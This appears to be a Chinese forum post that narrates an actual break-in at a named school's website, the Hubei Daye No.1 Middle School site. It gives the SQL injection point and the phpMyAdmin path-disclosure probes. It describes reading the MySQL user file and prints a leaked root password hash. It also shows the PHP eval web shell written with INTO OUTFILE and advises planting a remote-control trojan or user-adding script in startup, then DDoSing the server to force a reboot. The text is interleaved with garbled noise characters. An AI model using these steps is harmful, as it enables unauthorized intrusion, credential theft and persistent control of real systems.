友情检测湖北省大治市第一中学

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏
发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！


. D. e+ j5 {3 \( U) X
9 }' S7 L# t2 N8 _+ Z& B9 W常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限

那么想可以直接写入shell ，getshell有几个条件：

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF

) D& F6 M" _7 f; {试着爆绝对路径：
$ z) |  H+ r4 ~1./phpMyAdmin/index.php?lang[]=1  
! M6 U# X+ B' d9 F. O" h2./phpMyAdmin/phpinfo.php  
' I  @, M/ C" Z! r3 z$ E6 t( ]4 d3./load_file()  
6 P& P, ^$ H8 a0 m+ m; L3 |! \8 P4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
  d, c! d  q: L# z& _; z5./phpmyadmin/libraries/select_lang.lib.php  
: }  S2 ~2 o* P' k1 U6./phpmyadmin/libraries/lect_lang.lib.php  
& }( Z& G% j3 U# c$ Q! T7./phpmyadmin/libraries/mcrypt.lib.php   
- C0 u3 A: ^8 [( t8./phpmyadmin/libraries/export/xls.php  

8 @7 \- L* g4 l" \  D* c0 v均不行...........................
( F8 D6 _' q2 O* b7 {% S% l
御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php

0 |/ I1 v" v/ m# @. G" l9 r权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin

2 o$ g! H+ P# m( O# e3 G. A5 [; I  O默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败

敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........
9 t$ W3 |+ i3 T: S8 |1 e: P
& [2 [" w  l' n7 l想想root还可以读，读到root密码进phpmyadmin 也可以拿shell

http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini

* {3 z' |7 D/ V( X# x自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD

成功读到root密码：
3 V! |$ V' m. q& |, Y' q) S
17---- r(0072)
18---- o(006f)
19---- o(006f)
20---- t(0074)
0 r( d) Y; T' f* t21---- *(002a)
22---- 8(0038)
23---- 2(0032)
24---- E(0045)
25---- 1(0031)
26---- C(0043)
27---- 5(0035)
28---- 8(0038)
29---- 2(0032)
" h7 |0 y2 f/ Q# t30---- 8(0038)
$ o/ T! H0 _' o$ Q4 c" o31---- A(0041)
32---- 9(0039)
33---- B(0042)
34---- 5(0035)
35---- 4(0034)
5 P* x( S9 [" ~/ G$ h, h36---- 8(0038)
37---- 6(0036)
38---- 4(0034)
! u# T- t) T1 V3 g+ S9 S, L3 m39---- 9(0039)
40---- 1(0031)
41---- 1(0031)
1 D, t( {3 G! s2 O! H42---- 5(0035)
43---- 3(0033)
! X- `; ?6 k1 Y& X44---- 5(0035)
+ B! u0 K- A+ w45---- 9(0039)
46---- 8(0038)
2 _7 I+ J8 ]" ?6 s1 _47---- F(0046)
/ p/ }, U& i" M5 [, u+ k48---- F(0046)
/ E  |% m; K) J' E0 ?49---- 4(0034)
, L9 R: k( q, t  x# l. l' S50---- F(0046)
5 v1 ?( z( s% C9 J8 @8 K6 H51---- 0(0030)
' c6 y' C1 X. x, \) a52---- 3(0033)
" j3 F  ~% C$ N7 ^2 b/ @! e53---- 2(0032)
54---- A(0041)
2 U- M' n( D: X9 D1 N55---- 4(0034)
1 d' Q* H; W8 m: s, s9 J. C56---- A(0041)
57---- B(0042)
( r- }2 L! v8 h8 c! e58---- *(0044)
* j- U+ A, |9 G59---- *(0035)
* R1 b& }% x' T) U/ R* `- E$ }; d60---- *(0041)
61---- *0032)

4 P) {& z7 S9 O/ X6 [解密后成功登陆phpmyamin
4 G3 |4 y- n# N1 z" A; u                          
' M! i& h6 g% x# f% A  x, w  e5 e; v
                             
; y: s0 `# n; k3 A, M
! t9 V, ~, Q& e2 G( s; C找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
2 S+ D; v( ^5 |7 S! b% q! p
成功执行，拿下shell，菜刀连接：
4 J; I5 J, M) O4 Q
服务器不支持asp,aspx,php提权无果...................

但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：
. \* t5 j. b: [& d3 h4 u) ^- ?

服务器上已经有个隐藏帐号了

7 ^1 N8 S" F  N0 x: ]% @

别名     administrators
注释     管理员对计算机/域有不受限制的完全访问权

成员

3 t% A  T/ R. U8 u; p

-------------------------------------------------------------------------------
  k, U9 N5 Y5 W, F$ q& Tadmin
$ s, j  p- L8 J' j) F& u. [; sAdministrator
  ?% k. w! O& d) r. \1 Jslipper$
sqluser
0 J  v) F3 I& o命令成功完成。
6 C3 u8 ~/ u( `. U
服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。

6 @  h3 L: M& bddos服务器重启，不然就只能坐等服务器重启了...............................

) ]+ ^5 a3 g/ f# ^/ {      

8 [* A; [4 W4 o# _; _' I

angel